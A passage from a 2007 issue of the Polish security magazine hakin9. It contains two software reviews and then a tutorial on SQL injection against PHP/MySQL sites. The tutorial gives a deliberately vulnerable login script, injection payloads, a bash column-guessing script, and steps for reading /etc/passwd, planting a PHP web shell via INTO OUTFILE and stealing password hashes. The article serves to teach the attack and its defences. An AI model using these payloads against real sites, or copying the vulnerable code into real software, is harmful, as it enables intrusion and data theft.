12 Directory Opus 9 Narzędzia Producent: GP Software System: Windows 2000/XP/2003/Windows Vista Typ: Menadżer plików Strona producenta: Strona dystrybutora: Ocena: 5/5 Directory Opus (DOpus) to flagowy produkt firmy GPSoftware. DOpus jest menadżerem plików przeznaczonym pod Windows a (także pod najnowszą Vistę). Jego pierwsze wersje powstały na początku lat dziewięćdziesiątych. Najnowsza wersja (9) dodaje wiele nowych funkcji, przez co program jest lepszy. Jego układ oparty jest na panelach, podobnie jak Total Commandera (TC), jednak DOpus posiada znacznie większe możliwości. Pierwszą bardzo dużą zaletą jest podział na style, zakładki i panele. Interfejs jest dowolnie konfigurowalny możemy otworzyć tyle paneli, ile tylko chcemy, w jakimkolwiek położeniu (horyzontalnie i wertykalnie). Style natomiast są to predefiniowane układy paneli podwójny poziomy, pionowy, eksplorator, przezrocze, obrazy czy pojedynczy każdy z nich posiada inne przeznaczenie. Korzystanie z nich to sama przyjemność, gdyż mamy możliwość innego prezentowania plików w zależności od ich zawartości (możemy także definiować własne style). Zakładki niczym się nie różnią od tych znanych z przeglądarek, jednakże możemy zapisać układ wszystkich zakładek w folderze ulubionych i jednym kliknięciem przywracać stan DOpus a. Nie zabrakło obsługi protokołu FTP czy skompresowanych plików. Bardzo przydatnym dodatkiem jest możliwość wysyłania zdjęć do serwisu Flickr przy użyciu menu kontekstowego opublikujemy nasze ulubione zdjęcia bez korzystania z przeglądarki. Niestety, jedynym mankamentem DOpus a są skróty klawiaturowe. Jest ich bardzo dużo i trzeba się do nich przyzwyczaić, jednak bez większych problemów udało mi się je zmienić na te znane z TC. Doszliśmy do kolejnego etapu konfiguracji. Ustawienia trzeba liczyć w setkach (co jest zaletą). Autorzy programu postanowili zamieścić wyszukiwarkę do poruszania się po ustawieniach. Ich modyfikowanie możemy zacząć od dźwięków, przez udostępnianie, aż po integrację z systemem. Po kilku dniach pracy z programem skorzystałem z tej ostatniej możliwości i do teraz używam DOpus a jako zamiennika Eksploratora Microsoftu. Integracja jest bezproblemowa tj. działają menu kontekstowe, wszystkie foldery systemowe (Mój komputer, Panel sterowania, itp.), dodana jest także możliwość uruchamiania przez podwójne kliknięcie w dowolnym miejscu Pulpitu. Średnie zużycie pamięci przez DOpus a wynosi ok. 40 MB, ale w dzisiejszych czasach jest to rozsądna wielkość, zważywszy na możliwości, jakimi dysponuje program. Uruchamia się bardzo szybko (włącza się razem z systemem i rezyduje w pamięci), a użytkownik nie odczuwa przy tym żadnego dyskomfortu. Nie można w nim odnaleźć wad Windowsowego menadżera plików DOpus nie zawiesza się, nawet przy przeglądaniu folderów z dużą ilością zdjęć z miniaturkami. Directory Opus jest programem posiadającym same zalety i niemal nieograniczone możliwości, co czyni go niezwykle przydatnym. Pomimo, że jest to program komercyjny (po przeliczeniu kosztuje około 200zł), wart jest swojej ceny i mogę go polecić każdemu użytkownikowi systemów korporacji z Redmond. Amadeusz Jasak Rysunek 1. Zrzut ekranu oprogramowania Opus9 Rysunek 2. Interface menadżera plików Opus9 12 hakin9 Nr 10/2007
13 Narzędzia ConceptDraw MINDMAP 5 Professional Producent: Computer Systems Odessa System: Windows XP Typ: Mind Mapping Strona producenta: Strona dystrybutora: Ocena: 4/5 Każdy, kto rozpoczyna działalność gospodarczą, potrzebuje biznes planu, który określi opłacalność przedsięwzięcia. Najprostszym na to sposobem jest zbudowanie mapy myśli wykresu dokładnie obrazującego wszystkie pomysły. I tu przychodzi nam z pomocą program MINDMAP, który świetnie się do tego celu nadaje. MINDMAP 5 Professional to aplikacja pozwalająca na przygotowywanie prezentacji graficznych, które są pomocne przy tworzeniu różnego rodzaju projektów. Jej zaletą jest również to, że może zobrazować strukturę firmy, a nawet zadania, które mamy zamiar wykonać. Program pomaga również w rozwiązywaniu różnego rodzaju problemów czy też... tworzeniu drzewa genealogicznego. Program jest idealny do przedstawiania zarówno prostych, jak i profesjonalnych materiałów edukacyjnych. Pasek narzędzi pozwala na zmianę struktury mapy myśli oraz na dodawanie, usuwanie i edytowanie poszczególnych jej części. Istnieje także możliwość używania symboli, które pomagają w określeniu tematów, jak również w ich zapamiętaniu. Do programu można importować obrazki oraz wklejać cliparty. Tworząc nowy temat można dodać do niego komentarz, notatkę, a nawet hiperłącze. Jest też wiele możliwości formatowania tekstu oraz obrazków, poczynając od zmiany czcionki aż po zaawansowane metody graficzne. W porządkowaniu tego wszystkiego pomaga nam drzewo, ukazujące całą strukturę mapy. Boczny pasek pokazuje wszystkie strony w dokumencie, co jest wręcz niezbędne przy edycji rozbudowanych map.. Bardzo przydatną funkcją jest możliwość ukrywania gałęzi Rysunek 3. Zrzut ekranu programu MINDMAP 5 Professional mapy pozwala to zaprezentować główną ideę dokumentu oraz jego poszczególne podtematy. Jedną z zalet programu jest to, że choć dostępny w wersji angielskiej, to obsługuje polskie znaki diakrytyczne. Gdy nasza mapa nie mieści się na jednej stronie, istnieje możliwość rozbicia jej na dwie lub więcej kart. Kolejną ciekawą funkcją programu jest burza mózgów pozwala ona tworzyć pomysły i dyskutować o nich w grupie osób. Wystarczy zapisać swoje myśli, a program przekształci je w mapę myśli, którą możemy edytować, rozwijać i organizować. Pomiędzy poszczególnymi myślami tworzymy relacje, a następnie je formatujemy. Burzę mózgów można ograniczyć czasowo, ustawiając odpowiednią wartość we właściwościach mapy. Aby urozmaicić naszą mapę myśli, można dodawać figury geometryczne, linie proste i krzywe oraz cliparty. Profesjonalna baza clipartów, która zawiera ich aż 100, sprawia, że tworzenie mapy myśli staje się bardziej atrakcyjne, a sam efekt łatwiejszy w odbiorze. Całą naszą pracę można zapisać w postaci projektu, który zajmuje niewiele miejsca na dysku, a następnie wydrukować. I tu pojawia się problem, ponieważ podczas próby zapisu widzimy komunikat informujący o błędnym działaniu programu na szczęście projekt zostaje mimo to zapisany. Kolejnym problemem jest fakt, że zapisanego projektu... nie da się otworzyć, co znacznie utrudnia pracę z programem. Producent na swoim forum zapewnia jednak, że błąd pojawiający się w wersji 5.0 jest wyeliminowany w wersji Program MINDMAP 5 pomaga stworzyć prezentację bardziej efektywną oraz przedstawić ją w bardziej interesujący sposób niż MS PowerPoint. Po zakończeniu pracy projekt możemy eksportować do prezentacji PowerPointa, pliku graficznego, a nawet strony internetowej. MINDMAP 5 Professional zaskakuje swoimi możliwościami oraz wbudowanymi narzędziami. Program wart jest swojej ceny, choć nie każdego będzie na niego stać. Uważam, że nadaje się on bardziej dla firm niż do zastosowań domowych, ale na pewno pomoże przy nauce nudnych tematów. Ciekawostką jest to, że program poza systemem Windows działa również na platformie Mac. Po instalacji zajmuje niewiele miejsca na dysku (50MB). Niestety nie ma polskiej wersji językowej. Pomoc programu jest bardzo dobra porusza wszystkie problemy związane z tworzeniem mapy, wadą jest jedynie język angielski. Biorąc pod uwagę jego możliwości i cenę, program jest wart uwagi. Paweł Malinowski hakin9 Nr 10/
14 Ataki SQL Injection w praktyce Początki Dawid Gołuński stopień trudności Bazy danych są dziś nieodłączną częścią nowoczesnych aplikacji internetowych, takich jak sklepy internetowe czy serwisy aukcyjne. Język SQL, używany do komunikacji z bazą, choć oferuje wiele możliwości, stwarza też pewne zagrożenia. Wystarczy moment nieuwagi, aby pozostawione bez kontroli zapytanie posłużyło do przejęcia wrażliwych danych. Zacznijmy od utworzenia przykładowej tabeli o nazwie wwwusers, zawierającej następujące pola: id, name, login, pass. W tym celu skorzystamy z narzędzia mysql monitor, które doskonale nadaje się do testowania wszelkich zapytań i wyłapywania błędów. Proces tworzenia tabeli został przedstawiony na Listingu 1. Następnie, zgodnie z Listingiem 2. tworzymy prostą stronę internetową uwierzytelniającą użytkowników na podstawie haseł znajdujących się w bazie danych. Podatność na ataki źródło problemu Przedstawiony skrypt PHP używa zapytania SELECT do wybrania rekordu zawierającego podany login i hasło. Jeśli serwer w odpowiedzi zwróci przynajmniej jeden rekord, użytkownik zostanie zalogowany. Teoretycznie, zalogowanie bez znajomości hasła jest niemożliwe. Niestety, skrypt zawiera bardzo istotną lukę dane pobierane od użytkownika nie są w żaden sposób filtrowane. Stanowią one część dynamicznie utworzonego zapytania, przekazywanego do bazy. Oznacza to, że osoba odwiedzająca stronę ma bezpośredni wpływ na końcową formę zapytania! Brak lub niedostateczne filtrowanie danych pobranych od użytkownika może umożliwić wstrzyknięcie dodatkowego kodu SQL do podstawowego zapytania. Stąd nazwa ataku SQL Injection. Zalogowanie bez znajomości hasła Wyobraźmy sobie sytuację, w której ktoś wprowadzi w polu Username wartość dave'-- _ (ostatni znak to spacja), natomiast w polu Password dowolny ciąg znaków, np. nieznane. Skrypt po podstawieniu wartości obu pól utworzy takie oto zapytanie: Z artykułu dowiesz się czym są, jakie niosą zagrożenia oraz na czym polegają ataki SQL Injection, poznasz techniki używane podczas ataku, poznasz podstawowe metody obrony. Co powinieneś wiedzieć powinieneś znać podstawy języka SQL, powinieneś znać podstawy administracji systemem Linux oraz serwerem MySQL, powinieneś znać podstawy PHP, C oraz basha. 14 hakin9 Nr 10/2007
15 Ataki SQL Injection w praktyce SELECT * FROM wwwusers WHERE login='dave'-- ' AND pass='nieznane' Uwierzytelnienie przebiegnie dokładnie tak samo, jak w przypadku podania poprawnego hasła. Dzieje się tak dlatego, że dwa myślniki oznaczają w Listing 1. Budowa tabeli wwwusers składni SQL komentarz, co sprawia, że dalsza część zapytania zostaje kompletnie zignorowana przez serwer. Otrzymujemy więc zapytanie: SELECT * FROM wwwusers WHERE login='dave' które zwróci wiersz zawierający wyraz dave w polu login. Zalogowanie bez loginu oraz hasła Podając w pierwszym polu ciąg nobody' OR 1=1--, a w drugim podobnie jak poprzednio dowolny wyraz, otrzymamy zapytanie: mysql> CREATE TABLE wwwusers >(id int, name char(25), login char(25), pass char(25)); mysql> INSERT INTO wwwusers > VALUES('1', 'Dave', 'dave', 'secretdbpass'); mysql> INSERT INTO wwwusers > VALUES('2', 'John', 'john_usr', 'johnpassword'); mysql> INSERT INTO wwwusers > VALUES('3', 'Paul','admin','pass-www'); mysql> SELECT * FROM wwwusers; id name login pass Dave dave secretdbpass 2 John john_usr johnpassword 3 Paul admin admin-www rows in set (0.00 sec) Listing 2. Strona login.php <HTML> <BODY> <FORM name="log_form" method="post"> Username: <INPUT type="edit" name="user"> Password: <INPUT type="edit" name="pass"> <INPUT type="submit" value="log in"> </FORM> <?php if ( isset($_post['user']) && isset($_post['pass']) ){ $user = $_POST['user']; $pass = $_POST['pass']; } else die("nie przeslano danych"); $conn = mysql_connect("localhost","user","pass") or die("brak polaczenia z baza"); mysql_select_db("baza_danych") or die("nie ma takiej bazy"); /* Utworzenie zapytania w oparciu o przekazane wartosci */ $query = "SELECT * FROM wwwusers WHERE login='$user' AND pass='$pass'"; echo "<br>zapytanie wyslane do bazy:<br>". $query. "<br>"; /* Przeslanie zapytania do bazy */ $res = mysql_query($query); if (!$res) echo "<br>". mysql_error(). "<br>"; $record = mysql_fetch_row($res); /* Jesli serwer znalazl rekord to uzytkownik zostaje zalogowany*/ if ($record) { echo "<br>hello <b>$record[2]</b>! Oto twoje dane: <br><br>"; echo "<TABLE border=1><tr>"; echo "<td>id</td> <td>$record[0]</td></tr>"; echo "<tr><td>name</td> <td>$record[1]</td>"; echo "<tr><td>login</td> <td>$record[2]</td>"; echo "<tr><td>pass</td> <td>$record[3]</td></tr></table>"; } else echo "<br><b>podales zle haslo, lub login</b>";?> </BODY> </HTML> SELECT * FROM wwwusers WHERE login='nobody' OR 1=1 -- ' AND pass='nieznane' Co można przetłumaczyć jako pokaż wszystkie rekordy, w których pole login jest równe wyrazowi nobody albo 1=1. Drugie wyrażenie (1=1) jest zawsze prawdziwe dlatego mimo, że w bazie nie ma użytkownika nobody, dopasowane zostaną wszystkie rekordy zawarte w tabeli. W efekcie użytkownik zostanie zalogowany. Przechwycenie haseł Skrypt odczytuje jedynie pierwszy rekord zwrócony przez serwer. Dlatego stosując operator OR zobaczymy dane tylko pierwszego użytkownika. Aby zmusić skrypt do wyświetlenia kolejnych rekordów, zastosujemy kolejny operator LIMIT, którego wywołanie ma postać: LIMIT {[offset,] row_count} gdzie offset to przesunięcie określające, ile początkowych wierszy należy pominąć, a row _ count to ilość wierszy, którą chcemy otrzymać. Dodając do poprzedniego zapytania ciąg LIMIT 1,1 zostaniemy zalogowani jako kolejny, znajdujący się na drugim miejscu tabeli użytkownik john _ usr. Zwiększając dalej offset dojdziemy do hasła administratora. Ograniczenia Dotychczas wstrzykiwany kod stanowił jedynie parametry dla polecenia SELECT. Powstaje pytanie, czy istnieje szansa na wykonanie kolejnego niezależnego od pierwszego polecenia w ramach jednego zapytania? Do rozdzielania komend służy znak średnika. Po wprowadzeniu podczas logowania ciągu '; DROP TABLE wwwusers--, koń- hakin9 Nr 10/
16 Początki cowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='';drop TABLE wwwusers Zamiast spodziewanego efektu (skasowanie tabeli) otrzymamy jednak błąd: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';DROP Spowodowane jest to tym, że funkcja mysql _ query() nie pozwala wykonać dwóch rozłącznych zapytań w czasie jednego wywołania. Ogranicza to znacznie zakres ataku - nawet w przypadku całkowitego braku kontroli danych wejściowych. Mimo to, z pomocą operatora UNION, istnieje możliwość wykonania dodatkowych instrukcji SELECT. The used SELECT statements have a different number of columns Należy tu zauważyć, że pierwszy (zawarty w skrypcie PHP) SELECT wybiera wszystkie cztery pola (symbol *) tabeli wwwusers, natomiast drugi tylko dwa. Problem można rozwiązać poprzez wstawienie dowolnych wartości liczbowych w miejsce brakujących pól. Po wstawieniu liczb 1 i 2 końcowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='nic' UNION SELECT 1, 2, name, number FROM contact Jest ono jak najbardziej poprawne i da w wyniku wszystkie rekordy tabeli contact. Wynik nie zawiera rekordów z tabeli wwwusers, ponieważ żaden z nich nie został dopasowany (login nic nie istnieje). Serwer SQL Aby klient mógł przeprowadzić jakąkolwiek operację na bazie danych, musi istnieć serwer SQL. Rolą serwera jest przyjmowanie zapytań od klientów, wykonywanie żądanych operacji na bazie oraz przedstawianie wyników. Serwer bazy danych zarządza również użytkownikami i uprawnieniami. Do bardziej znanych serwerów należą: MySQL, PostgreSQL, MsSQL, Oracle. W tym artykule skoncentrowano się głównie na serwerze MySQL, który jest jednym z najpopularniejszych ze względu na szybkość działania, otwartość kodu i przenośność. Wiele opisanych technik powinno znaleźć zastosowanie również w przypadku innych serwerów baz danych. odwiedzający stronę ma wpływ (może je modyfikować). Są to w szczególności: Pobieranie informacji z innych tabel Obok tabeli wwwusers tworzymy tabelę contact - zgodnie z Listingiem 4. Aby wydobyć z niej informacje, posłużymy się operatorem UNION. Wpisując w formularzu: nic' UNION SELECT name,number FROM contact-- otrzymamy błąd: Przebieg ataku na bazę danych Jeżeli atakujący nie posiada konta na serwerze, a wynik skanowania portów nie przyniósł rezultatów, kolejnym krokiem w przełamaniu zabezpieczeń serwera może być przeszukanie strony WWW pod kątem błędów PHP/SQL. Gdzie wstrzyknąć kod? Na atak narażone są wszelkie miejsca kontaktu użytkownik-skrypt, na które Rysunek 1. Wpływ danych wejściowych na końcowe zapytanie Rysunek 2. Oszukanie skryptu login.php przy pomocy operatora OR wszelkiego typu pola edycyjne, parametry przekazywane w adresie URL, ciasteczka (cookies), ukryte pola formularzy, rozwijane listy wyboru, pola wyboru (checkbox, radio). W przypadku słabo zabezpieczonych stron internetowych zwykle udaje się odnaleźć niefiltrowaną zmienną wśród parametrów adresu URL. Mając do czynienia z lepiej zabezpieczonymi witrynami, warto sprawdzić mniej oczywiste miejsca, jak np. listy wyboru. Programiści często mylnie zakładają tu, że użytkownik posiada wybór ograniczony jedynie do elementów rozwijanej listy. Nic nie stoi przecież na przeszkodzie, aby stronę HTML zawierającą formularz z taką listą zapisać na dysku, a następnie zmodyfikować jedną z jej pozycji. Czasem poszukiwania, ze względu na dużą ilość potencjalnie niefiltrowanych miejsc, wymagają nawiązania sporej ilości połączeń z serwerem WWW. Takie próby zostają odnotowane w logach. Dlatego ataki przeprowadzane są zwykle przy użyciu serwerów pośredniczących (proxy). 16 hakin9 Nr 10/2007
17 Ataki SQL Injection w praktyce Serwer zwraca błąd W zależności od tego, gdzie trafi wstrzyknięty kod, komunikat błędu może informować o nieprawidłowej składni, nieistniejącej nazwie pola, błędnej wartości dla pola danego typu itp. Przypuśćmy, że zmieniając parametr c w adresie shop/index.php?pid=1&c=2 na c=abc2 serwer zwrócił błąd: Unknown column 'abc2' in 'where clause' W takim przypadku można domyślić się, że gdzieś w pliku index.php istnieje funkcja konstruująca zapytanie podobne do: SELECT * FROM produkty_tab WHERE c=$_get['c'] Odczytana z tablicy GET zmienna c nie jest ograniczona apostrofami, ponieważ programista nie przewidział wystąpienia w tym miejscu wartości innej niż liczbowa. Dlatego wstawienie ciągu znaków abc2 sprawia, że serwer próbuje odwołać się do tej wartości jak do nazwy pola, które jak wynika z komunikatu nie istnieje. Pierwszy zastrzyk Wiedząc, że zmienna c musi być liczbą i nie jest ograniczona apostrofami, można spróbować wykorzystać operator UNION w celu wstrzyknięcia dodatkowego polecenia. Przypisanie c=2 UNION SELECT 1-- utworzy zapytanie: Parę słów o UNION UNION jest operatorem pozwalającym scalić ze sobą wyniki dwóch lub większej ilości zapytań SELECT. Zrozumienie istoty jego działania jest niezmiernie ważne, gdyż stanowi podstawę większości ataków. Wstrzyknięty kod z reguły trafia na koniec zapytania dynamicznie utworzonego przez skrypt PHP. Atakujący nie ma możliwości zmiany zdefiniowanego na jego początku polecenia SQL, ani też dodania nowego po średniku. Jedyną możliwością ingerencji jest wtedy użycie UNION. Schemat wywołania tego operatora prezentuje się tak: SELECT... FROM... UNION SELECT... FROM... UNION... W odpowiedzi na tak skonstruowane zapytanie serwer najpierw wykona pierwsze polecenie SELECT, następnie drugie dostawiając jego wynik do rezultatu pierwszego polecenia itd. Każde z poleceń składowych może odwoływać się do różnych tabel, pól, a także posiadać dodatkowe warunki i parametry, niezależne od pozostałych. Istnieje tu jednak ograniczenie każdy SELECT musi wybierać identyczną liczbę pól. Ponadto odpowiadające sobie pola powinny być tego samego typu (w innym przypadku część serwerów odrzuci zapytanie). SELECT * FROM produkty_tab WHERE c=2 UNION SELECT 1-- Jeżeli skrypt nie dokona filtracji kodu, a tabela produkty _tab okaże się zawierać większą liczbę kolumn serwer zwróci błąd: The used SELECT statements have a different number of columns Liczba kolumn może zostać ustalona poprzez kolejne wstawianie cyfr po przecinkach, do momentu aż serwer nie wyświetli błędu: Listing 3. Prosty przykład użycia UNION /* Wynik pierwszego zapytania SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' imie nazwisko Jan Kowalski /* Wynik drugiego zapytania SELECT */ SELECT miasto,kraj FROM tabela miasto kraj Poznan Polska Warszawa Polska /* Zestawienia ze sobą wyników obu zapytań SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' UNION SELECT miasto,kraj FROM tabela imie nazwisko Jan Kowalski Poznan Polska Warszawa Polska c=2 UNION SELECT 1,2-- c=2 UNION SELECT 1,2, Niektóre tabele mogą zawierać dziesiątki kolumn, dlatego ustalenie właściwej liczby może zająć sporo czasu. Nasze zadanie może jednak zostać w pełni zautomatyzowane skryptem z Listingu 6. Po przesłaniu zapytania z właściwą liczbą kolumn na stronie powinny ukazać się wybrane cyfry. Jeżeli ich nie widać, atakowany skrypt najpewniej wyświetla tylko pierwszy rekord. Można temu zaradzić dodając operator LIMIT 0, który usunie wynik uzyskany z pierwszego polecenia SELECT. Where are we, czyli rekonesans Po nawiązaniu komunikacji z bazą można przystąpić do rozpoznawania środowiska, w jakim pracuje atakowany skrypt. Chcąc dowiedzieć się, na jakim koncie serwera SQL pracuje skrypt, wystarczy skorzystać z wbudowanej funk- hakin9 Nr 10/
18 Początki Listing 4. Budowa tabeli contact mysql> CREATE TABLE contact >(name char(25), number char(25); mysql> INSERT INTO contact VALUES('Mike', ' '); mysql> INSERT INTO contact VALUES('Tom', ' '); mysql> SELECT * FROM contact; name number Mike Tom rows in set (0.00 sec) Listing 5. Kod HTML listy wyboru <form name="locale" method="post" action="country.php"> <b>country/region:</b><br> <SELECT name="country" size="10"> <option value="afghanistan en-in">afghanistan</option> <option value="' UNION SELECT 1,2-- ">' UNION SELECT 1,2-- </option>... </SELECT> Listing 6. Skrypt num_of_cols.sh odgadujący liczbę kolumn #!/bin/bash # Skrypt probuje odgadnac liczbe kolumn tabeli poprzez wstawienie # ciagu: UNION SELECT 1-- w oznaczone (przez: _HERE_) miejsce adresu # URL i stopniowe zwiekszanie liczby wybieranych cyfr - do momentu az serwer # przestanie zwracac blad. Przed uruchomieniem trzeba ustawic zmienna PROXY # Uzycie:./script.sh [URL with _HERE_ keyword] [number_of_tries] # Przyklad: #./script.sh " 30 SKIP=0; PROXY="x.x.x.x:80"; sql="%20union%20select%201--%20"; if [ $# -lt 1 ]; then echo "read ussage!"; exit 1; fi if [ $# -eq 2 ] then try_count=$2; echo -e"trying $try_count times\n" else try_count=40; fi; add_columns() { sql=`echo $sql sed 's/--%20//g'`; sql="${sql},$((i+1))--%20"; } for (( i=1; i<=$try_count; i++ )) do if [ $SKIP -ne 0 ]; then SKIP=$((SKIP-1)); add_columns; continue; fi; url=`echo $1 sed "s/_here_/$sql/"`; echo "($i) Trying URL: $url..."; if! curl -x "$PROXY" "$url" lynx --dump -stdin grep -A4 -B4 SQL grep -i different; then echo echo "I found it! The number of columns is $i" echo -e "The correct URL is: \n$url\n\n" exit 0 fi; add_columns; echo; done; cji user(), która zwróci potrzebne informacje (w postaci user@host). Aby rezultat funkcji był widoczny, jej wywołanie musi zostać umieszczone w miejscu jednej z cyfr, które ukazały się na stronie w trakcie ustalania liczby kolumn, np.: SELECT 1,user(),3,4,5,6,7,8-- W uzyskaniu pozostałych informacji pomocne mogą okazać się również zmienne systemowe. Przykładowo, aby dowiedzieć się, na jakim systemie pracuje baza, można wykorzystać zmienną version _ compile _ os, której wartość ustali zapytanie: Zagłębianie się w system Mając podstawowe informacje o koncie oraz systemie, możemy pokusić się o użycie funkcji load _ file() w celu odczytania plików konfiguracyjnych systemu. Oczywiście podany jako parametr plik musi posiadać uprawnienia zezwalające procesowi serwera bazy na odczyt. Przykładami plików, które często posiadają takie uprawnienia, a zarazem dostarczają istotnych informacji są: /etc/passwd, /etc/inittab, /etc/my.cnf, /etc/inetd.conf, httpd.conf, skrypty startowe rc, niektóre dzienniki serwera (w tym logi SQL). Poznanie dokładnej wersji systemu zazwyczaj ogranicza się do odczytania pliku o nazwie w rodzaju /etc/redhat-release. Taka informacja zdradza umiejscowienie innych plików konfiguracyjnych charakterystycznych dla danej dystrybucji systemu. Czytanie skryptów PHP Oprócz wspomnianych plików, często możliwy jest odczyt źródeł aplikacji PHP. Źródła strony mogą zawierać niezakodowane hasła do baz danych (przekazane do funkcji mysql _ connect()), jak również zdra- 18 hakin9 Nr 10/2007
19 Ataki SQL Injection w praktyce Jest szansa, że programista w celu zapewnienia poprawnej pracy skryptu nadał katalogowi mail uprawnienia o+w. W takim wypadku wystarczy napisać krótki skrypt PHP wykonujący komendy podane jako parametr $cmd: <?php $cmd = $_GET['cmd']; $out = system("$cmd");?> Rysunek 4. Skrypt num_of_cols.sh w akcji dzić inne trudne do wykrycia z zewnątrz rodzaje błędów. Po połączeniu informacji o położeniu katalogu domowego (plik passwd) z nazwą katalogu przechowującego strony (plik httpd.conf), możemy próbować odczytać pliki indeksowe: load_file('/home/user_name/html_dir/ index.php') Prawdopodobieństwo odczytania pliku jest stosunkowo duże, ponieważ część administratorów nadaje katalogowi html _ dir i jego plikom prawa o+rx. Odczytanie pliku indeksowego wystarczy, aby śledząc odwołania typu include() dotrzeć do nazw kolejnych plików skryptu. Warto tu również wspomnieć o funkcji hex(), która pozwoli skonwertować odczytany plik na postać szesnastkową. Przydaje się to zwłaszcza do odczytywania plików zawierających znaki niedrukowalne. Pozwala też zapobiec interpretacji kodu przez właściwy skrypt lub przeglądarkę. Pisanie do plików MySQL oferuje możliwość zapisu do wskazanego pliku poprzez parę operatorów polecenia SELECT: OUTFILE i DUMPFILE. Odbywa się to w taki oto sposób: SELECT * FROM tabela INTO OUTFILE '/sciezka/do/pliku' Ze względów bezpieczeństwa nadpisywanie plików jest zabronione, dlatego ścieżka musi wskazywać nieistniejący plik. Mimo to operatory te stanowią duże zagrożenie. Wystarczy wyobrazić sobie, że podczas przeglądania źródeł PHP natrafiliśmy na fragment: $file = fopen("mail/list1.txt","w"); fwrite($file,"$ \n"); Trzy zapytania do information_schema SELECT schema_name FROM information_schema.schemata, SELECT table _ name FROM information _ schema.tables WHERE table _ schema='wybrana _ baza', SELECT column _ name FROM information _ schema.columns WHERE table _ schema='wybrana _ baza' AND table _ name='wybrana _ tabela' uzyskamy odpowiednio: listę wszystkich dostępnych baz, kompletną listę tabel bazy wybrana_baza, oraz kompletną listę pól zawartych w bazie wybrana_baza. Posiadając te informacje możemy już kierować zapytania do konkretnych tabel. Taki skrypt po konwersji na postać szesnastkową może zostać zapisany na serwerze z pomocą operatora OUTFILE. Po pomyślnym wykonaniu zapytania przedstawionego na Listingu 7. uzyskamy możliwość wykonywania komend powłoki z uprawnieniami procesu serwera WWW: ~user1/mail/run.php?cmd=ps. Czytanie baz danych Podstawowy problem związany z wyciąganiem informacji z nieznanej bazy wiąże się z nieznajomością jej struktury. Zazwyczaj nie jesteśmy w stanie przewidzieć nazw baz, tabel czy kolumn. Czasem informacje te pojawiają się w generowanych przez serwer komunikatach o błędach, lecz są to tylko szczątkowe dane. Nowsze wersje serwera MySQL udostępniają specjalną bazę information _ schema, która znakomicie ułatwia pracę z nieznanymi danymi. W celu przyspieszenia operacji odczytu danych z bazy można wykorzystać funkcję concat(), która pozwala scalić wartości kilku pól w jeden ciąg znaków. Przykładowo, zapytanie: SELECT concat('[ ',imie,'=', nazwisko,'=', telefon,'=', mail,' ]') FROM sklepdb.zamowienia wyświetli zawartość czterech pól tabeli zamowienia, rozdzielone znakami równości. Kradzież haseł Serwer MySQL przechowuje informacje o użytkownikach w bazie danych o nazwie mysql. Baza ta zawiera dane potrzebne do autoryzacji użytkowników, a także określa przy- hakin9 Nr 10/
20 Początki Rysunek 5. Wyświetlenie wyniku funkcji user() na atakowanej stronie sługujące im przywileje. Kluczowa tabela w niej zawarta to user, która posiada m. in. następujące pola: user nazwa użytkownika, host host, z którego użytkownik ma prawo się łączyć, password zaszyfrowane hasło w postaci skrótu (hash). Domyślnie tylko użytkownik o loginie root ma do niej dostęp. Jednak zdarza się, że administrator definiując dostępne obiekty dla nowego użytkownika wpisuje po prostu *.* co oznacza wszystkie bazy i tabele, łącznie z mysql.user. Skróty haseł różnią się między sobą długością. Krótsze wynikają z zastosowania starszego mechanizmu generowania hashy używanego w wersjach serwera MySQL starszych niż 4.1. Takie hasła są bardzo podatne na atak siłowy (brute force). Czas siłowego złamania 7-znakowego hasła zawierającego różnej wielkości litery, cyfry czy nawet znaki specjalne, na przeciętnym komputerze nie przekracza zwykle 5 minut. Należy pamiętać, że rozkodowanie hasła nie gwarantuje uzyskania dostępu do bazy. O tym, czy dany użytkownik będzie mógł zalogować się na dane konto decyduje pole host. Jeśli jest ono puste lub zawiera znak %, oznacza to, że na konto można zalogować się z dowolnego miejsca. Czy jednak hasła kont zezwalających wyłącznie na dostęp z lokalnego adresu są zupełnie bezużyteczne? Bynajmniej istnieje przecież szansa, że użytkownik posiada również konto systemowe (z dostępem do powłoki) z identycznym hasłem. Posiadając hasło do konta, które zezwala na zdalny dostęp, możemy uzyskać bezpośrednie połączenie z bazą (poleceniem mysql). Nie będziemy już ograniczeni do polecenia UNION SELECT. Zyskamy możliwość wykonywania pozostałych komend SQL w granicach uprawnień przypisanych do konta. Jeśli konto ma nadane maksymalne uprawnienia z bazą można zrobić praktycznie wszystko. Zdalny dostęp do serwera pozwala też na wykonanie dokładnej kopii wybranej bazy na lokalnym dysku twardym. Służy do tego narzędzie mysqldump, wywołane w taki sposób: mysqldump -u admin -p'pass' \ -h host sklepdb >dump.sql Problemy, na jakie może napotkać atakujący Ataki SQL Injection rzadko kiedy przebiegają bezproblemowo. Trudności w określeniu miejsca pozwalającego na wstrzyknięcie kodu, filtrowanie danych Wbudowane funkcje serwera MySQL wejściowych pod kątem znaków specjalnych czy brak wyświetlania wyników na stronie WWW to tylko część problemów mogących wystąpić podczas ataku. Wystarczająco zdeterminowany napastnik jest jednak w stanie przezwyciężyć niektóre z nich. Magiczne apostrofy Jeśli w konfiguracji PHP aktywowana zostanie opcja magic _ quotes _ gpc, to wszystkie dane pochodzące z zewnątrz (przekazane za pomocą metod GET, POST czy też ciasteczek) zostaną automatycznie zabezpieczone. Jeśli zmienna zawiera znaki:, ' czy \, to przed każdym z nich dopisany zostanie znak odwrotnego ukośnika (\) likwidując w ten sposób specjalne znaczenie każdego z wspomnianych znaków. Zakładając, że omawiana opcja jest aktywna, a w kodzie PHP znajduje się linijka: MySQL oferuje pokaźny zestaw wbudowanych funkcji, które pozwalają na wykonanie określonych czynności po stronie serwera. Stanowią one nieocenioną pomoc dla napastnika. Funkcje najczęściej używane w atakach SQL Injection to: load_file() odczytuje wskazany plik, user() zwraca nazwę aktualnie zalogowanego użytkownika, database() zwraca nazwę aktualnie używanej bazy, sleep() wstrzymuje pracę skryptu na określoną ilość sekund, hex(), unhex() konwersja liczb szesnastkowych, char() zamiana liczby na znak (w kodzie ASCII), concat() połączenie ze sobą ciągów znaków, if() tworzenie warunku, ascii() zwraca kod ASCII podanego znaku, count() zlicza otrzymane rekordy. Zmienne systemowe serwera MySQL Serwer MySQL przechowuje w pamięci dużą ilość zmiennych, które zawierają kluczowe informacje na temat konfiguracji bazy danych, a także o systemie 